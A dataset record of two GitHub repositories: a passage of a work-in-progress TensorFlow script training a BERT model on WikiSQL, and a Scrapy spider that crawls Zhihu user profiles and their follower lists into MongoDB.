[]\n g_wv = []\n for b, psql_i1 in enumerate(sql_i):\n g_sc.append( psql_i1[\"sel\"] )\n g_sa.append( psql_i1[\"agg\"])\n\n conds = psql_i1['conds']\n if not psql_i1[\"agg\"] < 0:\n g_wn.append( len( conds ) )\n g_wc.append( get_wc1(conds) )\n g_wo.append( get_wo1(conds) )\n g_wv.append( get_wv1(conds) )\n else:\n raise EnvironmentError\n return g_sc, g_sa, g_wn, g_wc, g_wo, g_wv\n\ndef padWhereConditions(clause_list):\n b = np.zeros([len(clause_list),len(max(clause_list,key = lambda x: len(x)))])\n b[:] = -1\n for i,j in enumerate(clause_list):\n b[i][0:len(j)] = j\n return(b)\ndef multihotEncodeWhereThings(where_things):\n max_where_things = len(set([x for y in where_things for x in y]))\n where_things_multihot = np.zeros([len(where_things),max_where_things])\n for i, where_things_locs in enumerate(where_things):\n where_things_multihot[i][where_things_locs] = 1\n \n return where_things_multihot\n \ndef parseSqlToLabels(sql): \n #return sql\n #return [random.randint(0, 1) for x in sql]\n sc,sa,wn,wc,wo,wv = get_g(sql)\n wc,wo = multihotEncodeWhereThings(wc),multihotEncodeWhereThings(wo)\n return np.array(sc),np.array(sa),np.array(wn),wc,wo\n\n\n#define token start and stop positions\ndef tok_hdr_start_top(input_ids):\n\ttok_pos = []\n\thead_pos = []\n\tfor idx, row in enumerate(input_ids):\n\t\t#print(idx)\n\t\t#seg positions\n\t\tsegs_long = np.where(row == 102)[0]\n\t\ttok_pos.append([1, segs_long[0]]) #start position is 1, ignore [CLS] token\n\t\tsegs = [];\n\t\tfor s in range(1,len(segs_long)):\n\t\t\tstart = segs_long[s-1] + 1 # start position\n\t\t\tend = segs_long[s] # end position\n\t\t\t#segs.append([start,end])\n\t\t\tsegs.append([start, start+1])\n\t\t\t\n\t\thead_pos.append(segs)\n\ttok_pos = np.array(tok_pos)\n\thead_pos = np.array(head_pos)\n\treturn tok_pos, head_pos\n\ndef create_wemb_masks(tok_pos, head_pos, mask_shape):\n\ttok_mask = np.zeros(mask_shape)\n\thead_mask = np.zeros(mask_shape)\n\thead_col_mask = np.ones(mask_shape)\n\tfor tidx, tp in enumerate(tok_pos):\n\t\ttok_mask[tidx, tp[0]:tp[1],:] = 1\n\t\n\tfor hidx, hp in enumerate(head_pos):\n\t\tfor hp1 in hp:\n\t\t\thead_mask[hidx,hp1[0]:hp1[1],:] = 1\n\t\n\tfor hidx, hp in enumerate(head_pos):\n\t\tfor hp1 in hp:\n\t\t\thead_col_mask[hidx,hp1[0]:hp1[1],:] = 1\n\t\n\treturn tok_mask, head_mask, head_col_mask\n\t\n\t\n\t\ndef mask_func(x):\n\tbool_mask = tf.logical_not(tf.greater(x,1))\n\tmask = tf.ones_like(x)*-9999999.0\n\tx = tf.where(bool_mask, x, mask)\n\treturn x\n\n\n#def mask_func(x):\n#\tx = tf.slice(x,[0,0,0],[x.shape[0], x.shape[1],1])\n#\tbool_mask = tf.greater(x,0)\n\t\n#\tmask = tf.ones_like(x)*-9999999.0\n#\tx = tf.where(bool_mask, x, mask)\n#\treturn x\n\t\ndef output_hack(x):\n\tbool_mask = tf.greater(x,0)\n\tnon_zero_values = tf.gather_nd(x, tf.where(boolean_mask))\n\trows = tf.split(non_zero_values, n_non_zero)\n\t#print(rows)\n\t# Pad with zeros wherever necessary and recombine into a single tensor\n\tout = tf.stack([tf.argmax(r)for r in rows])\n\t#rows = tf.split(non_zero_values, n_non_zero)\n\t\ndef build_model_masked(max_seq_length,max_out_len, wemb_mask_shape): \n\tmax_header_length = 13\n\ttuple(test_mask_shape[1:])\n\tin_id = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_ids\")\n\tin_mask = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_masks\")\n\tin_segment = tf.keras.layers.Input(shape=(max_seq_length,), name=\"segment_ids\")\n\tweight_input = tf.keras.layers.Input(shape=(max_out_len,), name=\"ce_weights\")\n\n\twemb_n_mask = tf.keras.layers.Input(shape=wemb_mask_shape, name=\"wemb_n_mask\")\n\twemb_h_mask = tf.keras.layers.Input(shape=wemb_mask_shape, name=\"wemb_h_mask\")\n\twemb_h_col_mask = tf.keras.layers.Input(shape=wemb_mask_shape, name=\"wemb_h_col_mask\")\n\n\tbert_inputs = [in_id, in_mask, in_segment]\n\tall_inputs = [in_id, in_mask, in_segment, wemb_n_mask, wemb_h_mask, wemb_h_col_mask]\n\tpooled_output, seq_output = BertLayer(n_fine_tune_layers=0, trainable = False)(bert_inputs)\n\tprint(seq_output)\n\n\t#wemb_n = tf.keras.layers.Multiply()([seq_output, wemb_n_mask])\n\t#wemb_h = tf.keras.layers.Multiply()([seq_output, wemb_h_mask])\n\t#wemb_h_col = tf.keras.layers.Multiply()([seq_output, wemb_h])\n\t#wemb_h_col = tf.keras.layers.Lambda(lambda x: mask_func(x))(wemb_h)\n\n\t#wemb_h_col = slice_concat()(wemb_h)\n\t#print(wemb_h_col)\n\t#wemb_n = tf.keras.layers.Flatten()(wemb_n)\n\t#wemb_h = tf.keras.layers.Flatten()(wemb_h)\n\twemb_h_col = tf.keras.layers.Flatten()(seq_output)\n\tprint(wemb_h_col)\n\t####mask and shit here\n\n\t#denseSC = tf.keras.layers.Dense(256, activation='relu',name=\"denseSC\")(wemb_h_col)\n\t#denseSA = tf.keras.layers.Dense(4, activation='relu',name=\"denseSA\")(wemb_h)\n\tdenseSA = tf.keras.layers.Dense(4, activation='relu',name=\"denseSA\")(pooled_output)\n\n\tdenseWN = tf.keras.layers.Dense(4, activation='relu',name=\"denseWN\")(pooled_output)\n\t#denseWC = tf.keras.layers.Dense(256, activation='relu',name=\"denseWC\")(wemb_h_col)\n\t#denseWO = tf.keras.layers.Dense(4, activation='relu',name=\"denseWO\")(wemb_h)\n\tdenseWO = tf.keras.layers.Dense(4, activation='relu',name=\"denseWO\")(pooled_output)\n\n\n\tsc = tf.keras.layers.Dense(max_header_length, activation='softmax',name=\"sc_output\")(wemb_h_col)\n\tsa = tf.keras.layers.Dense(4, activation='softmax',name=\"sa_output\")(denseSA)\n\twn = tf.keras.layers.Dense(4, activation='softmax',name=\"wn_output\")(denseWN) \n\twc = tf.keras.layers.Dense(max_header_length, activation='softmax',name=\"wc_output\")(denseWN)\n\two = tf.keras.layers.Dense(3, activation='softmax',name=\"wo_output\")(denseWO)\n\n\t#loss = weighted_categorical_crossentropy(weight_input) \n\t#loss=,\n\tmodel = tf.keras.models.Model(inputs=all_inputs, outputs=[sc,sa,wn,wc,wo])\n\n\n\tmodel.compile(loss={\"sc_output\":\"sparse_categorical_crossentropy\",\n\t\t\t\t\t\t\"sa_output\":\"sparse_categorical_crossentropy\",\n\t\t\t\t\t\t\"wn_output\":\"sparse_categorical_crossentropy\",\n\t\t\t\t\t\t#'wc_output': loss, \n\t\t\t\t\t\t#'wo_output': loss}, \n\t\t\t\t\t\t'wc_output': 'categorical_crossentropy', \n\t\t\t\t\t\t'wo_output': 'categorical_crossentropy'\n\t\t\t\t\t\t}, optimizer='adam', metrics=['accuracy'])\n\tmodel.summary()\n\n\treturn model\n\n\nclass BertLayer(tf.layers.Layer):\n\tdef __init__(self, n_fine_tune_layers=10, **kwargs):\n\t\tself.n_fine_tune_layers = n_fine_tune_layers\n\t\tself.trainable = True\n\t\tself.output_size = 768\n\t\tsuper(BertLayer, self).__init__(**kwargs)\n\n\tdef build(self, input_shape):\n\t\tself.bert = hub.Module(\n\t\t\tbert_path,\n\t\t\ttrainable=self.trainable,\n\t\t\tname=\"{}_module\".format(self.name)\n\t\t)\n\t\ttrainable_vars = self.bert.variables\n\t\t\n\t\t# Remove unused layers\n\t\ttrainable_vars = [var for var in trainable_vars if not \"/cls/\" in var.name]\n\t\t\n\t\t# Select how many layers to fine tune\n\t\ttrainable_vars = trainable_vars[-self.n_fine_tune_layers :]\n\t\t\n\t\t# Add to trainable weights\n\t\tfor var in trainable_vars:\n\t\t\tself._trainable_weights.append(var)\n\t\t\n\t\t# Add non-trainable weights\n\t\tfor var in self.bert.variables:\n\t\t\tif var not in self._trainable_weights:\n\t\t\t\tself._non_trainable_weights.append(var)\n\t\t\n\t\tsuper(BertLayer, self).build(input_shape)\n\n\tdef call(self, inputs):\n\t\tinputs = [K.cast(x, dtype=\"int32\") for x in inputs]\n\t\tinput_ids, input_mask, segment_ids = inputs\n\t\tbert_inputs = dict(\n\t\t\tinput_ids=input_ids, input_mask=input_mask, segment_ids=segment_ids\n\t\t)\n\t\tresult = self.bert(inputs=bert_inputs, signature=\"tokens\", as_dict=True)\n\t\tpooled_output = result['pooled_output']\n\t\tseq_output = result['sequence_output']\n\t\tprint('CONCAAAT')\n\t\t#seq_output = tf.map_fn(lambda x:remap(x), seq_output,infer_shape=False)\n\t\t#seq_output = seq_output[:,:,0]\n\t\t#seq_output = tf.reshape(seq_output, shape = (32, 222))\n\t\t#slice_concat()(wemb_h)\n\t\treturn pooled_output, seq_output\n\n\tdef compute_output_shape(self, input_shape):\n\t\treturn (input_shape[0], self.output_size)\n\n\ndef build_model_masked_select(max_seq_length,max_out_len, wemb_mask_shape, mask_idx): \n\tmax_header_length = 13\n\t#tuple(test_mask_shape[1:])\n\tin_id = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_ids\")\n\tin_mask = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_masks\")\n\tin_segment = tf.keras.layers.Input(shape=(max_seq_length,), name=\"segment_ids\")\n\tweight_input = tf.keras.layers.Input(shape=(max_out_len,), name=\"ce_weights\")\n\n\twemb_n_mask = tf.keras.layers.Input(shape=wemb_mask_shape, name=\"wemb_n_mask\")\n\twemb_h_mask = tf.keras.layers.Input(shape=wemb_mask_shape, name=\"wemb_h_mask\")\n\twemb_h_col_mask = tf.keras.layers.Input(shape=wemb_mask_shape, name=\"wemb_h_col_mask\")\n\twemb_mask_idx= tf.keras.layers.Input(shape=tuple(wemb_mask_shape[1:]), name=\"wemb_h_col_mask\")\n\t\n\toutput_mask = tf.keras.layers.Input(shape = (max_header_length,), name = 'output_mask')\n\t\n\t\n\tbert_inputs = [in_id, in_mask, in_segment]\n\tall_inputs = [in_id, in_mask, in_segment, wemb_n_mask, wemb_h_mask, wemb_h_col_mask, output_mask]\n\tpooled_output, seq_output = BertLayer(n_fine_tune_layers=1, trainable = False)(bert_inputs)\n\t\n\t#test = slice_concat()\n\t#test.build(mask_idx)\n\t#test = test(seq_output)\n\t#print(test)\n\t#wemb = tf.keras.layers.Lambda(lambda x: K.map_fn(lambda y:remap(y),x),output_shape=[32,222,768])(seq_output)\n\t\n\t\n\t#wemb = tf.reshape(wemb, shape = [tf.shape(seq_output)[0], 222, 768])\n\t#print(wemb)\n\t#print('BEFORE')\n\t#print(wemb)\n\t#wemb = tf.keras.layers.Reshape((-1, 222,768))(wemb)\n\t#print(wemb)\n\t#print(seq_output)\n\n\t#wemb_n = tf.keras.layers.Multiply()([seq_output, wemb_n_mask])\n\t#wemb_h = tf.keras.layers.Multiply()([seq_output, wemb_h_mask])\n\t#wemb_h = \n\t\n\ttest = slice_concat()\n\ttest.build(mask_idx)\n\ttest = test(seq_output)\n\t#wemb_h = tf.slice_concat()(wemb_h)\n\t#wemb_h_col = tf.keras.layers.Multiply()([seq_output, wemb_h])\n\t#wemb_h_col = tf.keras.layers.Lambda(lambda x: mask_func(x))(wemb_h)\n\n\t#wemb_h_col = slice_concat()(wemb_h)\n\t#print(wemb_h_col)\n\t#wemb_n = tf.keras.layers.Flatten()(wemb_n)\n\t#wemb_h = tf.keras.layers.Flatten()(wemb_h)\n\t#wemb_h_col = tf.keras.layers.Flatten()(seq_output)\n\t#print(wemb_h_col)\n\t####mask and shit here\n\n\tdenseSC = tf.keras.layers.Dense(1024, activation='relu',name=\"denseSC\")(test)\n\t#denseSC1 = tf.keras.layers.Dense(1024, activation='relu',name=\"denseSC1\")(denseSC)\n\t#denseSC2 = tf.keras.layers.Dense(1024, activation='relu',name=\"denseSC2\")(denseSC1)\n\t\n\t\n\t#denseSA = tf.keras.layers.Dense(4, activation='relu',name=\"denseSA\")(wemb_h)\n\t#denseSA = tf.keras.layers.Dense(4, activation='relu',name=\"denseSA\")(pooled_output)\n\n\t#denseWN = tf.keras.layers.Dense(4, activation='relu',name=\"denseWN\")(pooled_output)\n\t#denseWC = tf.keras.layers.Dense(256, activation='relu',name=\"denseWC\")(wemb_h_col)\n\t#denseWO = tf.keras.layers.Dense(4, activation='relu',name=\"denseWO\")(wemb_h)\n\t#denseWO = tf.keras.layers.Dense(4, activation='relu',name=\"denseWO\")(pooled_output)\n\t\n\t#pre_sc = tf.keras.layers.Dense(max_header_length, activation='linear',name=\"sc_pre_output\")(denseSC2)\n\t#pre_sc = tf.keras.layers.Add()([pre_sc, output_mask])\n\t\n\t#sc = tf.keras.layers.Activation(activation = 'softmax', name = 'sc_output')(pre_sc)\n\tsc = tf.keras.layers.Dense(max_header_length, activation='softmax',name=\"sc_output\")(denseSC)\n\t#sa = tf.keras.layers.Dense(4, activation='softmax',name=\"sa_output\")(denseSA)\n\t#wn = tf.keras.layers.Dense(4, activation='softmax',name=\"wn_output\")(denseWN) \n\t#wc = tf.keras.layers.Dense(max_header_length, activation='softmax',name=\"wc_output\")(denseWN)\n\t#wo = tf.keras.layers.Dense(3, activation='softmax',name=\"wo_output\")(denseWO)\n\n\t#loss = weighted_categorical_crossentropy(weight_input) \n\t#loss=,\n\tmodel = tf.keras.models.Model(inputs=all_inputs, outputs=[sc])\n\n\n\tmodel.compile(loss={\"sc_output\":\"sparse_categorical_crossentropy\",\n\t\t\t\t\t\t#\"sa_output\":\"sparse_categorical_crossentropy\",\n\t\t\t\t\t\t#\"wn_output\":\"sparse_categorical_crossentropy\",\n\t\t\t\t\t\t#'wc_output': loss, \n\t\t\t\t\t\t#'wo_output': loss}, \n\t\t\t\t\t\t#'wc_output': 'categorical_crossentropy', \n\t\t\t\t\t\t#'wo_output': 'categorical_crossentropy'\n\t\t\t\t\t\t}, optimizer='adam', metrics=['accuracy'])\n\tmodel.summary()\n\n\treturn model, seq_output\n \n\n###############################\n###############################\ndef pad_values(a_as_vector, max_n = 20):\n print(a_as_vector)\n zero_padding = tf.zeros(max_n - tf.shape(a_as_vector), dtype=a_as_vector.dtype)\n # Concatenate `a_as_vector` with the padding.\n a_padded = K.concatenate([a_as_vector, zero_padding], 0)\n print(a_padded)\n return a_padded\n \ndef remap(vector_a):\n b = K.map_fn(lambda x:pad_values(tf.gather(x,tf.squeeze(tf.where(tf.not_equal(x,0))))),vector_a)\n return b\n \ndef remap_old(vector_a):\n b = tf.map_fn(lambda x:pad_values(tf.gather(x,tf.squeeze(tf.where(tf.not_equal(x,0))))),vector_a)\n # b = b.slice(start = [0,0], \n return b\n\nclass slice_concat(tf.layers.Layer):\n\tdef __init__(self):\n\t\tsuper(slice_concat, self).__init__()\n\tdef build(self, mask_idx):\n\t\tself.mask_idx = mask_idx\n\t\t#self.max_n = input_params[1]\n\t\t#print(input_params)\n\t\tsuper(slice_concat, self).build(mask_idx)\n\tdef call(self, inputs):\n\t\tout_arr = tf.gather_nd(inputs, self.mask_idx)\n\t\tprint(out_arr)\n\t\t#out_arr = tf.stack(tf.map_fn(lambda x:remap(x), inputs,infer_shape=False))\n\t\t#print(out_arr)\n\t\t#out_arr = tf.map_fn(lambda x: slice_map(x,self.input_idx), inputs)\n\t\t#slice_x = tf.slice(inputs, begin = [0,0,0], size = [tf.shape(inputs)[-1], 222, 0])\n\t\t#out_arr = tf.map_fn(lambda x:pad_values(tf.gather(x,tf.squeeze(tf.where(tf.not_equal(x,0))))),inputs)\n\t\t#out_arr = tf.stack(out_arr)\n\t\t#tf.print(tf.shape(out_arr))\n\t\t#out_arr = tf.reshape(out_arr, shape = (tf.shape(inputs)[0],222,768))\n\t\t#tf.print(tf.shape(out_arr))\n\t\t##out_arr = out_arr[:,:,0]\n\t\t#tf.print(tf.shape(out_arr))\n\t\t#out_arr = tf.squeeze(out_arr)\n\t\t#tf.print(tf.shape(out_arr))\n\t\t#out_arr = tf.reshape(out_arr, shape = (tf.shape(inputs)[0],222))\n\t\t#tf.print(tf.shape(out_arr))\n\t\t#print(out_arr)\n\t\t#out_arr = tf.slice(out_arr, begin = [0,0,0], size = tf.shape(out_arr)[-1], max_n, tf\n\t\treturn out_arr\n\tdef compute_output_shape(self, input_shape):\n\t\treturn (input_shape[0], 2)\n\t\t\nclass custom_mask(tf.layers.Layer):\n\tdef __init_(self):\n\t\tsuper(custom_mask,self).__init__()\n\tdef build(self, mask_idx):\n\t\tself.mask_idx = mask_idx\n\t\tsuper(custom_mask, self).build(mask_idx)\n\tdef call():\n\t\treturn self.mask_idx\n##################################\n\ndef zero_pad_mask(mask, n_pos = 20):\n\tmask_df = pd.DataFrame(mask)\n\tmask_df = mask_df[mask_df[2] == 0]\n\tout = [];\n\t\n\tfor bid in mask_df[0].unique():\n\t\tbatch_df = mask_df[mask_df[0] == bid]\n\t\tbatch_arr = batch_df.iloc[:n_pos,:].values\n\t\tn_missing = n_pos - batch_arr.shape[0]\n\t\tpad = np.tile([0,0,0], [n_missing, 1])\n\t\tbatch_arr = np.concatenate((batch_arr, pad))\n\t\tbatch_arr = [list(row) for row in batch_arr]\n\t\t#print(batch_arr.shape)\n\t\tout.append(batch_arr)\n\t\n\t##out = np.concatenate(batch_arr, axis = 1)\n\treturn out\n\t\t\n\t\n\t\n\t\n\t\t\n\n\n\t\t\n\nif __name__ == '__main__':\n\tnum_CPU = 1\n\tnum_GPU = 0\n\tnum_cores = 10\n\tconfig = tf.ConfigProto(intra_op_parallelism_threads=num_cores,\n\t\t\t\t\t\tinter_op_parallelism_threads=num_cores,\n\t\t\t\t\t\tallow_soft_placement=True,\n\t\t\t\t\t\tdevice_count = {'CPU' : num_CPU,\n\t\t\t\t\t\t\t\t\t\t'GPU' : num_GPU}\n\t\t\t\t\t )\n\n\tsess = tf.Session(config = config)\n\n\ttraining_data, train_labels = makeTrainingData(use_reduced_set=True,sample_size=10000)\n\tsc,sa,wn,wc,wo = train_labels\n\t\n\t# In[4]:\n\tos.environ['TFHUB_CACHE_DIR'] = '/DataDrive/master-wikisql/tfhub_cache/'\n\n\n\t# In[5]:\n\tbert_path = \"https://tfhub.dev/google/bert_uncased_L-12_H-768_A-12/1\"\n\tset(wc.flatten())\n\n\t# In[87]:\n\tmax_num_headers = len(set(wc.flatten()))\n\tw = np.ones([wc.shape[0],wc.shape[1],max_num_headers])\n\tw.shape\n\tw[np.where(wc==-1)] = 0\n\tlen(w)\n\n\n\t#training_data, train_labels = makeTrainingData(use_reduced_set=True,sample_size=10000)\n\t#sc,sa,wn,wc,wo = train_labels\n\t\n\tmax_num_headers = len(set(wc.flatten()))\n\tw = np.ones([wc.shape[0],wc.shape[1]])\n\t#w[np.where(w>=0)] = 1\n\tw[np.where(wc==-1)] = 0\n\tmax_out_len = wc.shape[1]\n\t\n\tsplit = int(0.8*len(wc))\n\ttest_data = training_data[split:]\n\ttraining_data = training_data[:split]\n\n\ttest_labels_sc = sc[split:]\n\ttrain_labels_sc = sc[:split]\n\n\ttest_labels_sa = sa[split:]\n\ttrain_labels_sa = sa[:split]\n\n\n\ttest_labels_wn = wn[split:]\n\ttrain_labels_wn = wn[:split]\n\n\ttest_labels_wc = wc[split:]\n\ttrain_labels_wc = wc[:split]\n\n\ttest_labels_wo = wo[split:]\n\ttrain_labels_wo = wo[:split]\n\n\ttrain_weights = w[:split]\n\ttest_weights = w[split:]\n\t#test_labels = np.array(test_labels).reshape(-1, 1)\n\t#train_labels= np.array(train_labels).reshape(-1, 1)\n\n\ttrain_input_ids,train_input_masks,train_segment_ids = formatForBert(training_data)\n\ttest_input_ids,test_input_masks,test_segment_ids = formatForBert(test_data)\n\n\t#training_data,train_labels = makeTrainingData(use_reduced_set=True,sample_size=5000)\n\n\t\n\tmax_seq_length = 222\n\tbert_out_size = 768\n\tbatch_size = 32\n\tfor epoch in range(10):\n\t\tfor b in range(0, 8000, batch_size):\n\t\t\tin_train_input_ids = train_input_ids[b:b+batch_size]\n\t\t\tin_train_input_masks = train_input_masks[b:b+batch_size]\n\t\t\tin_train_segment_ids = train_segment_ids[b:b+batch_size]\n\t\t\tin_train_labels_sc = train_labels_sc[b:b+batch_size]\n\t\t\t\n\t\t\t#header start stopcreate masks for train and test\n\t\t\ttrain_mask_shape = (len(in_train_input_ids), max_seq_length, bert_out_size)\n\t\t\ttrain_tok_pos, train_head_pos = tok_hdr_start_top(in_train_input_ids)\n\t\t\ttrain_tok_mask, train_head_mask, train_head_col_mask = create_wemb_masks(train_tok_pos, train_head_pos, train_mask_shape)\n\t\t\ttrain_head_mask_idx = zero_pad_mask(np.array(np.where(train_head_mask)).T, n_pos = 13)\n\t\t\t\n\t\t\toutput_mask = np.zeros((batch_size, 13))\n\t\t\tfor row in range(batch_size):\n\t\t\t\tend = len(train_head_pos[row])\n\t\t\t\toutput_mask[row,end:] = -999999999\n\t\t\t#print(output_mask)\n\t\t\t#x = asd\n\t\t\t#todo input mask idx\n\t\t\t#x = asd\n\t\t\t#test_mask_shape = (len(test_input_ids), max_seq_length, bert_out_size)\n\t\t\t#test_tok_pos, test_head_pos = tok_hdr_start_top(test_input_ids)\n\t\t\t#test_tok_mask, test_head_mask, test_head_col_mask = create_wemb_masks(test_tok_pos, test_head_pos, test_mask_shape)\n\t\t\t\n\t\t\tlayer_weights = []\n\t\t\t#x = sad\n\t\t\t#model = build_model_masked(max_seq_length=max_seq_length, max_out_len=max_out_len, wemb_mask_shape = tuple(test_mask_shape[1:]))\n\t\t\t\n\t\t\tif epoch == 0 and b == 0:\n\t\t\t\tmodel, seq_output = build_model_masked_select(max_seq_length=max_seq_length, max_out_len=max_out_len, wemb_mask_shape = tuple(train_mask_shape[1:]), mask_idx = train_head_mask_idx)\n\t\t\t\tinitialize_vars(sess)\n\t\t\t\t\n\t\t\telse:\n\t\t\t\ttest = slice_concat()\n\t\t\t\ttest.build(train_head_mask_idx)\n\t\t\t\ttest = test(seq_output)\n\t\t\t\tmodel.layers[4] = test\n\t\t\t\n\t\t\t#if len(layer_weights) > 0:\n\t\t\t#\tmodel.layers[5].set_weights(layer_weights)\n\t\t\tprint(epoch, '-', b)\n\t\t\tmodel.fit(\n\t\t\t\t#[train_input_ids, train_input_masks, train_segment_ids, train_weights], \n\t\t\t\t[in_train_input_ids, in_train_input_masks, in_train_segment_ids, train_tok_mask, train_head_mask, train_head_col_mask, output_mask], \n\t\t\t\t\t{\"sc_output\":in_train_labels_sc},\n\t\t\t\t#validation_data=(#[test_input_ids,test_input_masks,test_segment_ids, test_weights],\n\t\t\t\t#\t\t\t[test_input_ids,test_input_masks,test_segment_ids, test_tok_mask, test_head_mask[:,:,0], test_head_col_mask],\n\t\t\t\t#\t\t\t\t {\"sc_output\":test_labels_sc}),\n\t\t\t\tepochs=1,\n\t\t\t\tbatch_size=batch_size\n\t\t\t)\n\t\t\n\t\t#layer_weights = model.layers[5].get_weights()\n\t\t# In[ ]:\n\n\n\n\t# Build the rest of the classifier \n\t\t\n\t#max_out_len = 3\n\t#model = build_model(max_seq_length=222,max_out_len=max_out_len)\n\n\t# Instantiate variables\n\t\n\tmodel.fit(\n\t\t#[train_input_ids, train_input_masks, train_segment_ids, train_weights], \n\t\t[train_input_ids, train_input_masks, train_segment_ids, train_tok_mask, train_head_mask, train_head_col_mask, output_mask], \n\t\t\t{\"sc_output\":train_labels_sc,\"sa_output\":train_labels_sa,\n\t\t\t \"wn_output\":train_labels_wn,\"wc_output\":train_labels_wc,\"wo_output\":train_labels_wo},\n\t\tvalidation_data=(#[test_input_ids,test_input_masks,test_segment_ids, test_weights],\n\t\t\t\t\t[test_input_ids,test_input_masks,test_segment_ids, test_tok_mask, test_head_mask, test_head_col_mask],\n\t\t\t\t\t\t {\"sc_output\":test_labels_sc,\"sa_output\":test_labels_sa,\n\t\t\t\t\t\t \"wn_output\":test_labels_wn,\"wc_output\":test_labels_wc,\n\t\t\t\t\t\t \"wo_output\":test_labels_wo}),\n\t\tepochs=1,\n\t\tbatch_size=32\n\t)\n\t\t\n\t\n\tx = sad\n\n\t# In[68]:\n\n\n\ti = 1\n\ttest_example = test_data[i]\n\tp_id,p_mask,p_seg = formatForBert([test_example])\n\n\tinput1,input2,input3,input4 = p_id,p_mask,p_seg,np.array([test_weights[i,:]])\n\n\n\t# In[70]:\n\n\n\ttest_example\n\n\n\t# In[69]:\n\n\n\tmodel.predict([input1,input2,input3,input4])\n\n\n\t# In[89]:\n\n\n\t{\"sc_output\":train_labels_sc,\"sa_output\":train_labels_sa,\n\t \"wn_output\":train_labels_wn,\"wc_output\":train_labels_wc,\"wo_output\":train_labels_wo},\n\ttrain_labels_wo.max()\n\n\n\t# In[143]:\n\n\n\t\n\n\n\t# In[19]:\n\n\n\twc.shape,wo.shape\n\n" } ]
2
MinuteSheep/zhihu
https://github.com/MinuteSheep/zhihu
ec7f22aca2b6a29e9141dea302d3543f6bc5b4d2
735f9847aa8bb311f56cfbb611fd6ac23b707baf
6d367fcd9fe8f4e8e4e0a5be939e4c750bda90e4
refs/heads/master
2020-03-26T20:26:16.264905
2018-08-19T17:15:43
2018-08-19T17:15:43
145,323,653
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6775431632995605, "alphanum_fraction": 0.6794625520706177, "avg_line_length": 33.66666793823242, "blob_id": "f432da515a44646995b93d975be44e657e68403c", "content_id": "27970b4d3d576dd4486a9c651009f2fc7b80a11f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 521, "license_type": "no_license", "max_line_length": 70, "num_lines": 15, "path": "/zhihu/pipelines.py", "repo_name": "MinuteSheep/zhihu", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport pymongo\n\n\nclass MongoPipeline(object):\n def process_item(self, item, spider):\n client = pymongo.MongoClient(spider.settings.get('MONGO_URI'))\n db = client[spider.settings.get('MONGO_DB')]\n table = db[spider.settings.get('MONGO_TABLE')]\n table.update({'name':item['name']},dict(item),True)\n\n" }, { "alpha_fraction": 0.6315789222717285, "alphanum_fraction": 0.635904848575592, "avg_line_length": 53.39215850830078, "blob_id": "2571abe4b3f1e6f33e0ec5d706a81e7542886e82", "content_id": "8072bda3a41e918c12a905fdce5da2de8bcc6cfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2774, "license_type": "no_license", "max_line_length": 176, "num_lines": 51, "path": "/zhihu/spiders/user.py", "repo_name": "MinuteSheep/zhihu", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport scrapy\nimport json\nfrom zhihu.items import ZhihuItem\n\n\nclass UserSpider(scrapy.Spider):\n name = 'user'\n allowed_domains = ['www.zhihu.com']\n start_user = 'zhang-jia-wei'\n user_url = 'https://www.zhihu.com/api/v4/members/%s?include=%s'\n user_include = 'allow_message,is_followed,is_following,is_org,is_blocking,employments,answer_count,follower_count,articles_count,gender,badge[?(type=best_answerer)].topics'\n followings_url = 'https://www.zhihu.com/api/v4/members/%s/followees?include=%s&offset=20&limit=20'\n followings_include = 'data[*].answer_count,articles_count,gender,follower_count,is_followed,is_following,badge[?(type=best_answerer)].topics'\n followers_url = 'https://www.zhihu.com/api/v4/members/%s/followers?include=%s&offset=20&limit=20'\n followers_include = 'data[*].answer_count,articles_count,gender,follower_count,is_followed,is_following,badge[?(type=best_answerer)].topics'\n\n def start_requests(self):\n yield scrapy.Request(self.user_url % (self.start_user, self.user_include), callback=self.parse_user)\n\n def parse_user(self, request):\n item = ZhihuItem()\n results = json.loads(request.text)\n for field in item.fields:\n if field in results.keys():\n item[field] = results.get(field)\n yield item\n yield scrapy.Request(self.followings_url % (results.get('url_token'), self.followings_include),\n callback=self.parse_followings)\n yield scrapy.Request(self.followers_url % (results.get('url_token'), self.followers_include),\n callback=self.parse_followers)\n\n def parse_followings(self, request):\n results = json.loads(request.text)\n if 'data' in results.keys():\n for result in results.get('data'):\n yield scrapy.Request(self.user_url % (result.get('url_token'), self.user_include),\n callback=self.parse_user)\n if 'paging' in results.keys() and results.get('paging').get('is_end') == 'false':\n next_page = results.get('paging').get('next')\n yield scrapy.Request(next_page, callback=self.parse_followings)\n\n def parse_followers(self, request):\n results = json.loads(request.text)\n if 'data' in results.keys():\n for result in results.get('data'):\n yield scrapy.Request(self.user_url % (result.get('url_token'), self.user_include),\n callback=self.parse_user)\n if 'paging' in results.keys() and results.get('paging').get('is_end') == 'false':\n next_page = results.get('paging').get('next')\n yield scrapy.Request(next_page, callback=self.parse_followers)\n" } ]
2
andyhyshi/Weather-Changes
https://github.com/andyhyshi/Weather-Changes
acdb7b556467b8bbbd02f2310f023bfbf49bc6ba
30cb4d57ff32dac8c1b90f873435c898b10987c8
9973c8866c89ee4726e243a01c4d08b9a2e9a768
refs/heads/master
2022-07-16T15:23:31.470198
2020-05-10T23:03:55
2020-05-10T23:03:55
null
0
0
null
null
null
null
null
